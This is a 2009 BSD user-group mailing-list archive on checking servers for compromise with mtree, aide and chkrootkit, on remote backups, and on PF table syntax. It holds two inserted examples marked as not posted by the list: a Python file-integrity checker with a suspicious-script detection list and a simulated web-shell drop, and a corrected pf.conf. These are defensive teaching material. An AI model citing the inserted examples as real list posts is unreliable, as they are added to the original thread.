References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com>
Message-ID: <20090303235422.GI37605@zaph.org>

* Andy Kosela [2009-03-03 23:48:10+0000]:
> > and also you can use something like tripwire to check your upload
> > dirs/web application source/etc, but tripwire gets pretty tedious
> > because someone has to parse the input..
>
> Tripwire became a bloated beast nowadays.  I'm using mtree(8) for
> checking file integrity and it is a very good tool for such a job.

Interesting, I use aide.  It is a little old (the last release was in
2006, and IIRC it was dormant for a while before that), but it does the
trick.

If you're familiar with aide, how would you compare it with mtree?
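What mtree(8) and aide both do for the upload and session directories this thread is about, as an added example in Python (it is neither mtree nor aide, and was not posted by anyone on the list): record a specification of every entry under a root (type, mode, owner, size and a SHA-256 digest for regular files), save it, and later diff the live tree against it to get added, removed and changed paths, then apply the chkrootkit-style filter of "new script or executable in a directory the web server writes to". Timestamps are deliberately left out of the spec because touch(1) forges them trivially. The demo tree, file names and contents are constructed; the temp directory stands in for /tmp.

```python
"""mtree(8)-style baseline and verification for a directory tree.

Added example for this thread; it is neither mtree nor aide, and was not
posted by anyone on the list.
"""
import hashlib
import json
import os
import shutil
import stat
import tempfile

HASH_CHUNK = 1 << 16
# names a web-server user has no business creating in a temp or upload tree
SUSPECT_SUFFIXES = (".php", ".phtml", ".pl", ".sh")


def _digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(HASH_CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def _entry(path, st):
    """The keywords an mtree spec line would carry; no mtime, it is too easy to forge."""
    if stat.S_ISDIR(st.st_mode):
        kind = "dir"
    elif stat.S_ISLNK(st.st_mode):
        kind = "link"
    else:
        kind = "file"
    entry = {"type": kind, "mode": stat.S_IMODE(st.st_mode),
             "uid": st.st_uid, "gid": st.st_gid}
    if kind == "file":
        entry["size"] = st.st_size
        entry["sha256"] = _digest(path)
    elif kind == "link":
        entry["target"] = os.readlink(path)
    return entry


def build_spec(root):
    """Record every entry under root, keyed by relative path, without following symlinks."""
    spec = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic walk order keeps saved specs diffable
        for name in sorted(dirnames + filenames):
            full = os.path.join(dirpath, name)
            spec[os.path.relpath(full, root)] = _entry(full, os.lstat(full))
    return spec


def save_spec(spec, path):
    with open(path, "w") as fh:
        json.dump(spec, fh, indent=1, sort_keys=True)


def load_spec(path):
    with open(path) as fh:
        return json.load(fh)


def verify(root, baseline):
    """Diff the live tree against a saved spec; 'changed' maps path -> differing fields."""
    current = build_spec(root)
    changed = {}
    for rel in sorted(set(current) & set(baseline)):
        fields = sorted(k for k in set(current[rel]) | set(baseline[rel])
                        if current[rel].get(k) != baseline[rel].get(k))
        if fields:
            changed[rel] = fields
    return {"added": sorted(set(current) - set(baseline)),
            "removed": sorted(set(baseline) - set(current)),
            "changed": changed,
            "current": current}  # kept so callers can inspect the new entries


def suspect_new_files(report):
    """chkrootkit-style filter: new regular files that are scripts or executable."""
    return [rel for rel in report["added"]
            if report["current"][rel]["type"] == "file"
            and (rel.lower().endswith(SUSPECT_SUFFIXES)
                 or report["current"][rel]["mode"] & 0o111)]


def demo():
    """Constructed scenario: baseline a stand-in for /tmp, then simulate a
    web-shell drop and a tampered upload, and return what verify() reports."""
    root = tempfile.mkdtemp(prefix="mtree-demo-")
    vault = tempfile.mkdtemp(prefix="mtree-spec-")  # stands in for off-host storage
    try:
        os.makedirs(os.path.join(root, "upload"))
        with open(os.path.join(root, "sess_0123abcd"), "w") as fh:
            fh.write('user|s:5:"alice";')  # a PHP session file that stays untouched
        notes = os.path.join(root, "upload", "notes.txt")
        with open(notes, "w") as fh:
            fh.write("legit upload\n")
        spec_file = os.path.join(vault, "baseline.json")
        save_spec(build_spec(root), spec_file)
        # attacker activity after the baseline was taken
        with open(os.path.join(root, "upload", "shell.php"), "w") as fh:
            fh.write("<?php /* placeholder for a dropped web shell */ ?>\n")
        with open(notes, "a") as fh:
            fh.write("tampered\n")
        report = verify(root, load_spec(spec_file))
        report["suspect"] = suspect_new_files(report)
        return report
    finally:
        shutil.rmtree(root)
        shutil.rmtree(vault)


if __name__ == "__main__":
    r = demo()
    print("added:", r["added"], "changed:", r["changed"], "suspect:", r["suspect"])
```

The check is only as good as the place the spec lives: keep it off the host or on read-only media and run the comparison from a trusted machine, because a baseline the web server's user, or an intruder who got root by the route Andy describes, can rewrite proves nothing.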
Thomas

From raj at brainlink.com Tue Mar 3 18:43:27 2009
From: raj at brainlink.com (Raj Goel)
Date: Tue, 3 Mar 2009 23:43:27 +0000
Subject: [nycbug-talk] Remote backup services
Message-ID: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry>

Guys,

Has anyone figured out how to implement Mozy- or Carbonite-like backup
services using FOSS tools?

How would you back up linux, bsd, mac clients?  Windows?

Like the idea of wan-based backups, dislike trusting vendors that may
cease to exist.

Rajesh Goel, CISSP
cell (917) 685-7731
CTO: Brainlink International, Inc.
"IT Crisis Management and Solutions"

From akosela at andykosela.com Wed Mar 4 07:39:34 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Wed, 04 Mar 2009 13:39:34 +0100
Subject: [nycbug-talk] mtree
In-Reply-To: <20090303235422.GI37605@zaph.org>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> <20090303235422.GI37605@zaph.org>
Message-ID: <49ae7686.v2vZanwLUIA/w4wA%akosela@andykosela.com>

"N. J. Thomas" wrote:
> * Andy Kosela [2009-03-03 23:48:10+0000]:
> > > and also you can use something like tripwire to check your upload
> > > dirs/web application source/etc, but tripwire gets pretty tedious
> > > because someone has to parse the input..
> >
> > Tripwire became a bloated beast nowadays.  I'm using mtree(8) for
> > checking file integrity and it is a very good tool for such a job.
>
> Interesting, I use aide.  It is a little old (the last release was in
> 2006, and IIRC it was dormant for a while before that), but it does the
> trick.
>
> If you're familiar with aide, how would you compare it with mtree?

Aide is a good alternative to tripwire if you happen to have a mixed
environment consisting of several UNIX flavors.
It is the default integrity scanner for RHEL, but can run as well on FreeBSD, HP-UX, Solaris, AIX, you name it. I use mtree(8) because: * At the moment I'm using it for the hosts in public DMZ (and I have FreeBSD machines there only). * It is much simpler and straightforward than aide. I usually use the most simple program to do the job, and mtree(8) is already in the base system, and seems reasonably fast. Also I recommend you read 'man 7 security', section about 'Checking File Integrity' for some nice techniques to implement in this scenario. --Andy From skreuzer at exit2shell.com Wed Mar 4 09:05:40 2009 From: skreuzer at exit2shell.com (Steven Kreuzer) Date: Wed, 4 Mar 2009 09:05:40 -0500 Subject: [nycbug-talk] Remote backup services In-Reply-To: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> Message-ID: <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> On Mar 3, 2009, at 6:43 PM, Raj Goel wrote: > Guys, > > Has anyone figured out how to implement Mozy or Carbonite like > backup services using FOSS tools? > > How would you backup linux, bsd, mac clients? Windows? > > Like the idea of wan-based backups, dislike trusting vendors that > may cease to exist. Thats a pretty open ended question. How much infrastructure are you willing to put behind this? How reliable do you need it to be? How much money are you willing to spend? How many clients are you backing up? How much storage space do you need? 
-- Steven Kreuzer http://www.exit2shell.com/~skreuzer From george at ceetonetechnology.com Wed Mar 4 09:30:46 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 09:30:46 -0500 Subject: [nycbug-talk] Remote backup services In-Reply-To: <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> <5D0DAC0B-5A1C-46B7-9264-B7028FF2369C@exit2shell.com> Message-ID: <49AE9096.3080102@ceetonetechnology.com> Steven Kreuzer wrote: > On Mar 3, 2009, at 6:43 PM, Raj Goel wrote: > >> Guys, >> >> Has anyone figured out how to implement Mozy or Carbonite like >> backup services using FOSS tools? >> >> How would you backup linux, bsd, mac clients? Windows? >> >> Like the idea of wan-based backups, dislike trusting vendors that >> may cease to exist. > > Thats a pretty open ended question. > > How much infrastructure are you willing to put behind this? > How reliable do you need it to be? > How much money are you willing to spend? > How many clients are you backing up? > How much storage space do you need? The question that comes to my mind is whose infrastructure? Are you building this out yourself? If so, I assume you have some decent colocation somewhere remote. And with decent hardware to back it up. . . RAID, etc. And maybe multiple locations. If it's a clients infrastructure, are they willing to commit to the necessary infrastructure? George From matt at atopia.net Wed Mar 4 11:20:32 2009 From: matt at atopia.net (Matt Juszczak) Date: Wed, 4 Mar 2009 11:20:32 -0500 (EST) Subject: [nycbug-talk] Searching for suspect PHP files... 
In-Reply-To: <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: > Tripwire became a bloated beast nowadays. I'm using mtree(8) for > checking files integrity and it is a very good tool for such job. > > --Andy So say I wanted to check if an existing system of mine has been compromised. I already know that chkrootkit is returning nothing, but that's returning nothing with no source to compare to, so obviously there's the potential there for error. Should I compile world in /usr/src and use chkrootkit with a basedir of the compiled binaries? Or should I use mtree, and if so, suggestions on best ways? From george at ceetonetechnology.com Wed Mar 4 11:28:39 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 11:28:39 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: <49AEAC37.2070701@ceetonetechnology.com> Matt Juszczak wrote: >> Tripwire became a bloated beast nowadays. I'm using mtree(8) for >> checking files integrity and it is a very good tool for such job. >> >> --Andy > > So say I wanted to check if an existing system of mine has been > compromised. I already know that chkrootkit is returning nothing, but > that's returning nothing with no source to compare to, so obviously > there's the potential there for error. > > Should I compile world in /usr/src and use chkrootkit with a basedir of > the compiled binaries? Or should I use mtree, and if so, suggestions on > best ways? > IMHO, it depends on the context. 
mtree is great if you're looking at a set of static files. . . clearly a dynamically generated www site will have files that can't be simply mtree'd. If you're looking at a static site, mtree can be fine for the files in questions, then use chkrootkit for a *clean* base system. If your starting point is with a questionable base system, start over. :) HTH George From akosela at andykosela.com Wed Mar 4 12:21:53 2009 From: akosela at andykosela.com (Andy Kosela) Date: Wed, 04 Mar 2009 18:21:53 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49AEAC37.2070701@ceetonetechnology.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> <49AEAC37.2070701@ceetonetechnology.com> Message-ID: <49aeb8b1.hxxlIJR1yad49uSH%akosela@andykosela.com> George Rosamond wrote: > Matt Juszczak wrote: > >> Tripwire became a bloated beast nowadays. I'm using mtree(8) for > >> checking files integrity and it is a very good tool for such job. > >> > >> --Andy > > > > So say I wanted to check if an existing system of mine has been > > compromised. I already know that chkrootkit is returning nothing, but > > that's returning nothing with no source to compare to, so obviously > > there's the potential there for error. > > > > Should I compile world in /usr/src and use chkrootkit with a basedir of > > the compiled binaries? Or should I use mtree, and if so, suggestions on > > best ways? > > > > IMHO, it depends on the context. > > mtree is great if you're looking at a set of static files. . . clearly a > dynamically generated www site will have files that can't be simply mtree'd. First, what is the point of checking file integrity for the *dynamically* generated set of files? Those solutions work best for base system files like /bin and /sbin binaries to see if somebody messed with them. 
If you didn't make a fresh specification just *before* you put the system online, then you will never know if you have been "trojan horsed". Also make sure you scan the suspect system from another highly secured machine and use mtree(8) from that machine. It is very probable that first thing an attacker would do on your system would be to change mtree(8), so that it would not work as expected. --Andy From carton at Ivy.NET Wed Mar 4 14:08:30 2009 From: carton at Ivy.NET (Miles Nordin) Date: Wed, 04 Mar 2009 14:08:30 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: (Matt Juszczak's message of "Wed, 4 Mar 2009 11:20:32 -0500 (EST)") References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: >>>>> "mj" == Matt Juszczak writes: mj> say I wanted to check if an existing system of mine has mj> been compromised. I vote we should start using Vinge's word for this scenario: ``perverted''. Instead of ``the box has been compromised,'' say ``that machinery has become perverted.'' Instead of ``the worm is spreading through all our systems in that IP block really quickly,'' say ``the perversion is spreading throughout the entire cluster.'' -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From nonesuch at bad-apples.org Wed Mar 4 14:18:43 2009 From: nonesuch at bad-apples.org (Mark Saad) Date: Wed, 04 Mar 2009 14:18:43 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists Message-ID: <49AED413.1060200@bad-apples.org> Hello All Here is my question; when using PF can I create a const table made up of predefined lists. Here is my example it does not work I am using FreeBSD 7.1-RELEASE i386 . 
=============================

ext_if="bge0"
int_if="bge1"

#My Netgroup lists
NETGROUP_SJL = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 10.131.146.132 }"
NETGROUP_LON = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }"
NETGROUP_EWR = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }"
NETGROUP_HKG = "{ 10.168.209.218 10.168.209.40 10.168.208.100 10.168.209.192/28 }"
NETGROUP_BACKUP = "{ 192.168.12.0/26 }"
ISILON_SMQ = "{ 192.168.14.0/24 }"

table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR $NETGROUP_HKG $NETGROUP_BACKUP }

# Do not filter lo
set skip on {lo0}

# Normalize
scrub in

# NAT the internal network to the outside world
nat on $ext_if from !($ext_if) to any -> ($ext_if)

# Begin Firewall rules
block in
pass out

pass quick on $int_if no state
antispoof quick for { lo $int_if }

pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) port 22

===============================

The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I get the following error:

/etc/pf.conf:15: syntax error
set skip on { lo0 }
no IP address found for NETGROUP_ALL
/etc/pf.conf:33: could not parse host specification
%

Any ideas ?

--
]Mark Saad[
mark at bad-apples.org

()  ascii ribbon campaign - against html e-mail
/\  www.asciiribbon.org   - against proprietary attachments

From george at ceetonetechnology.com Wed Mar 4 14:45:23 2009
From: george at ceetonetechnology.com (George Rosamond)
Date: Wed, 04 Mar 2009 14:45:23 -0500
Subject: [nycbug-talk] PF question: Can I make a const table made up of lists
In-Reply-To: <49AED413.1060200@bad-apples.org>
References: <49AED413.1060200@bad-apples.org>
Message-ID: <49AEDA53.4090709@ceetonetechnology.com>

Mark Saad wrote:
> Hello All
>    Here is my question; when using PF can I create a const table made
> up of predefined lists.
> Here is my example; it does not work. I am using FreeBSD 7.1-RELEASE i386 .
> > ============================= > > ext_if="bge0" > int_if="bge1" > > #My Netgroup lists > NETGROUP_SJL = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 > 10.131.146.132 }" > NETGROUP_LON = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }" > NETGROUP_EWR = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }" > NETGROUP_HKG = "{ 10.168.209.218 10.168.209.40 10.168.208.100 > 10.168.209.192/28 }" > NETGROUP_BACKUP = "{ 192.168.12.0/26 }" > ISILON_SMQ = "{ 192.168.14.0/24 }" > > table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR > $NETGROUP_HKG $NETGROUP_BACKUP } > > # Do not filter lo > set skip on {lo0} > > # Normalize > scrub in > > # NAT the internal network to the outside world > nat on $ext_if from !($ext_if) to any -> ($ext_if) > > # Begin Firewall rules > block in > pass out > > pass quick on $int_if no state > antispoof quick for { lo $int_if } > > pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) > port 22 > > =============================== > > > The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I > get the following error > > /etc/pf.conf:15: syntax error > set skip on { lo0 } > no IP address found for NETGROUP_ALL > /etc/pf.conf:33: could not parse host specification > % > > Any ideas ? > And I guess the question is, does pf support nested groups since NETGROUP_ALL is a nested group (can't count lines :). . which i believe it doesn't. g From george at ceetonetechnology.com Wed Mar 4 14:47:57 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 14:47:57 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... 
In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: <49AEDAED.5020809@ceetonetechnology.com> Miles Nordin wrote: >>>>>> "mj" == Matt Juszczak writes: > > mj> say I wanted to check if an existing system of mine has > mj> been compromised. > > I vote we should start using Vinge's word for this scenario: > ``perverted''. Instead of ``the box has been compromised,'' say > ``that machinery has become perverted.'' > > Instead of ``the worm is spreading through all our systems in that IP > block really quickly,'' say ``the perversion is spreading throughout > the entire cluster.'' This guy? http://en.wikipedia.org/wiki/Vernor_Vinge +1 miles, although 'perverted' already gets overused, IMHO. g From george at ceetonetechnology.com Wed Mar 4 13:47:38 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 13:47:38 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49aeb8b1.hxxlIJR1yad49uSH%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> <49AEAC37.2070701@ceetonetechnology.com> <49aeb8b1.hxxlIJR1yad49uSH%akosela@andykosela.com> Message-ID: <49AECCCA.9020904@ceetonetechnology.com> Andy Kosela wrote: > George Rosamond wrote: > >> Matt Juszczak wrote: >>>> Tripwire became a bloated beast nowadays. I'm using mtree(8) for >>>> checking files integrity and it is a very good tool for such job. >>>> >>>> --Andy >>> So say I wanted to check if an existing system of mine has been >>> compromised. 
I already know that chkrootkit is returning nothing, but >>> that's returning nothing with no source to compare to, so obviously >>> there's the potential there for error. >>> >>> Should I compile world in /usr/src and use chkrootkit with a basedir of >>> the compiled binaries? Or should I use mtree, and if so, suggestions on >>> best ways? >>> >> IMHO, it depends on the context. >> >> mtree is great if you're looking at a set of static files. . . clearly a >> dynamically generated www site will have files that can't be simply mtree'd. > > First, what is the point of checking file integrity for the > *dynamically* generated set of files? Err. . that was my point, if made unclear. . . dynamically generated files are a bit of a hassle to mtree :) > > Those solutions work best for base system files like /bin and /sbin > binaries to see if somebody messed with them. If you didn't make a > fresh specification just *before* you put the system online, then you > will never know if you have been "trojan horsed". Also make sure you > scan the suspect system from another highly secured machine and use > mtree(8) from that machine. It is very probable that first thing an > attacker would do on your system would be to change mtree(8), so that it > would not work as expected. > Of course. . . And the most effective way of doing such an mtree is to have it done remotely . . . depending on the context. Maybe from outside a chroot, or (ike don't punch me), from the host to a FreeBSD jail. If it's just static www content, it can be done remotely with wget. It all depends on the context. . . checksum'g: 1. base system? without a FreeBSD jail or full system remote access, you're right, it's a bit suspect in results. 2. 
dynamic www content: good luck outside of the static files g From max at neuropunks.org Wed Mar 4 14:35:13 2009 From: max at neuropunks.org (Max Gribov) Date: Wed, 04 Mar 2009 14:35:13 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <49AED413.1060200@bad-apples.org> References: <49AED413.1060200@bad-apples.org> Message-ID: <49AED7F1.5070903@neuropunks.org> Mark Saad wrote: > Hello All > Here is my question; when using PF can I create a const table made > up of predefined lists. > table persist file "/etc/sometable" sometable file would have one ip per line.. > Here is my example it does not work I am using FreeBSD 7.1-RELEASE i386 . > > ============================= > > ext_if="bge0" > int_if="bge1" > > #My Netgroup lists > NETGROUP_SJL = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 > 10.131.146.132 }" > NETGROUP_LON = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }" > NETGROUP_EWR = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }" > NETGROUP_HKG = "{ 10.168.209.218 10.168.209.40 10.168.208.100 > 10.168.209.192/28 }" > NETGROUP_BACKUP = "{ 192.168.12.0/26 }" > ISILON_SMQ = "{ 192.168.14.0/24 }" > > table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR > $NETGROUP_HKG $NETGROUP_BACKUP } > > # Do not filter lo > set skip on {lo0} > > # Normalize > scrub in > > # NAT the internal network to the outside world > nat on $ext_if from !($ext_if) to any -> ($ext_if) > > # Begin Firewall rules > block in > pass out > > pass quick on $int_if no state > antispoof quick for { lo $int_if } > > pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) > port 22 > > =============================== > > > The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I > get the following error > > /etc/pf.conf:15: syntax error > set skip on { lo0 } > no IP address found for NETGROUP_ALL > /etc/pf.conf:33: could not parse host specification > % > > Any ideas ? 
> > From nonesuch at bad-apples.org Wed Mar 4 15:01:24 2009 From: nonesuch at bad-apples.org (Mark Saad) Date: Wed, 04 Mar 2009 15:01:24 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <49AED7F1.5070903@neuropunks.org> References: <49AED413.1060200@bad-apples.org> <49AED7F1.5070903@neuropunks.org> Message-ID: <49AEDE14.2020907@bad-apples.org> Max Gribov wrote: > Mark Saad wrote: >> Hello All >> Here is my question; when using PF can I create a const table >> made up of predefined lists. >> > > table persist file "/etc/sometable" > > sometable file would have one ip per line.. > > > Could this also be done with a list of lists ? IE: NETGROUP_ALL = NETGROUP_SJL NETGROUP_LON NETGROUP_EWR NETGROUP_HKG NETGROUP_BACKUP >> Here is my example it does not work I am using FreeBSD 7.1-RELEASE >> i386 . >> >> ============================= >> >> ext_if="bge0" >> int_if="bge1" >> >> #My Netgroup lists >> NETGROUP_SJL = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 >> 10.131.146.132 }" >> NETGROUP_LON = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }" >> NETGROUP_EWR = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }" >> NETGROUP_HKG = "{ 10.168.209.218 10.168.209.40 10.168.208.100 >> 10.168.209.192/28 }" >> NETGROUP_BACKUP = "{ 192.168.12.0/26 }" >> ISILON_SMQ = "{ 192.168.14.0/24 }" >> >> table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR >> $NETGROUP_HKG $NETGROUP_BACKUP } >> >> # Do not filter lo >> set skip on {lo0} >> >> # Normalize >> scrub in >> >> # NAT the internal network to the outside world >> nat on $ext_if from !($ext_if) to any -> ($ext_if) >> >> # Begin Firewall rules >> block in >> pass out >> >> pass quick on $int_if no state >> antispoof quick for { lo $int_if } >> >> pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to >> ($ext_if) port 22 >> >> =============================== >> >> >> The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I >> get the following 
error
>>
>> /etc/pf.conf:15: syntax error
>> set skip on { lo0 }
>> no IP address found for NETGROUP_ALL
>> /etc/pf.conf:33: could not parse host specification
>> %
>>
>> Any ideas ?
>>
>>
>

--
]Mark Saad[
mark at bad-apples.org

()  ascii ribbon campaign - against html e-mail
/\  www.asciiribbon.org   - against proprietary attachments

From bonsaime at gmail.com Wed Mar 4 15:15:45 2009
From: bonsaime at gmail.com (Jesse Callaway)
Date: Wed, 4 Mar 2009 15:15:45 -0500
Subject: [nycbug-talk] PF question: Can I make a const table made up of lists
In-Reply-To: <49AEDE14.2020907@bad-apples.org>
References: <49AED413.1060200@bad-apples.org> <49AED7F1.5070903@neuropunks.org> <49AEDE14.2020907@bad-apples.org>
Message-ID:

On Wed, Mar 4, 2009 at 3:01 PM, Mark Saad wrote:
> Max Gribov wrote:
>> Mark Saad wrote:
>>> Hello All
>>>    Here is my question; when using PF can I create a const table
>>> made up of predefined lists.
>>>
>>
>> table persist file "/etc/sometable"
>>
>> sometable file would have one ip per line..
>>
>>
>>
> Could this also be done with a list of lists ?
>
>  IE: NETGROUP_ALL = NETGROUP_SJL NETGROUP_LON NETGROUP_EWR NETGROUP_HKG
> NETGROUP_BACKUP
>
>>> Here is my example it does not work I am using FreeBSD 7.1-RELEASE
>>> i386 .
>>>
>>> =============================
>>>
>>> ext_if="bge0"
>>> int_if="bge1"
>>>
>>> #My Netgroup lists
>>> NETGROUP_SJL  = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26
>>> 10.131.146.132 }"
>>> NETGROUP_LON  = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }"
>>> NETGROUP_EWR  = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }"
>>> NETGROUP_HKG  = "{ 10.168.209.218 10.168.209.40 10.168.208.100
>>> 10.168.209.192/28 }"
>>> NETGROUP_BACKUP = "{ 192.168.12.0/26 }"
>>> ISILON_SMQ = "{ 192.168.14.0/24 }"
>>>
>>> table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR
>>> $NETGROUP_HKG $NETGROUP_BACKUP }
>>>
>>> # Do not filter lo
>>> set skip on {lo0}
>>>
>>> # Normalize
>>> scrub in
>>>
>>> # NAT the internal network to the outside world
>>> nat on $ext_if from !($ext_if) to any -> ($ext_if)
>>>
>>> # Begin Firewall rules
>>> block in
>>> pass out
>>>
>>> pass quick on $int_if no state
>>> antispoof quick for { lo $int_if }
>>>
>>> pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to
>>> ($ext_if) port 22
>>>
>>> ===============================
>>>
>>>
>>> The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I
>>> get the following error
>>>
>>> /etc/pf.conf:15: syntax error
>>> set skip on { lo0 }
>>> no IP address found for NETGROUP_ALL
>>> /etc/pf.conf:33: could not parse host specification
>>> %
>>>
>>> Any ideas ?
>>>
>>>
>>
>
>
> --
> ]Mark Saad[
> mark at bad-apples.org
>
> ()  ascii ribbon campaign - against html e-mail
> /\  www.asciiribbon.org   - against proprietary attachments
>
> _______________________________________________
> talk mailing list
> talk at lists.nycbug.org
> http://lists.nycbug.org/mailman/listinfo/talk
>

Hi Mark,

Try this guy out.

pfctl -n -f /etc/pf.conf

If it works, then load up the ruleset and then have pfctl dump the rules onto the screen. If NETGROUP_ALL looks like it should, then success. If not, then it's back to the drawing board.
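The const-table-from-macros construction this thread is chasing, as an added example that is not Mark's ruleset: the table line as posted sits beside the form pf.conf accepts. Addresses are constructed RFC 1918 ranges; only the macro names follow the thread.

```pf
# Added example, not the ruleset posted in this thread.  Addresses are
# constructed RFC 1918 ranges; the macro names follow the thread.
ext_if="bge0"

NETGROUP_SJL = "{ 10.70.0.0/24 10.70.1.16/28 }"
NETGROUP_LON = "{ 10.72.0.0/24 }"
NETGROUP_BACKUP = "{ 192.168.12.0/26 }"

# As posted: a bare word where pf expects a table name.  pfctl reports a
# syntax error on this line, and on the later "from NETGROUP_ALL" it
# treats NETGROUP_ALL as a hostname to resolve, which is where
# "no IP address found for NETGROUP_ALL" comes from.
#table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_BACKUP }

# Accepted: table names are written in angle brackets both where the
# table is defined and where it is referenced.  Each macro expands to a
# nested { } list, which pf flattens, so a const table can be assembled
# from several predefined lists.
table <NETGROUP_ALL> const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_BACKUP }

# Default deny inbound; the netgroups alone may reach ssh on the
# external interface.
block in
pass out
pass in quick on $ext_if inet proto tcp from <NETGROUP_ALL> to ($ext_if) port 22
```

After pfctl -nf /etc/pf.conf parses cleanly and the ruleset is loaded, pfctl -t NETGROUP_ALL -T show lists the addresses the table actually holds, which is the quickest way to confirm every macro made it in.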
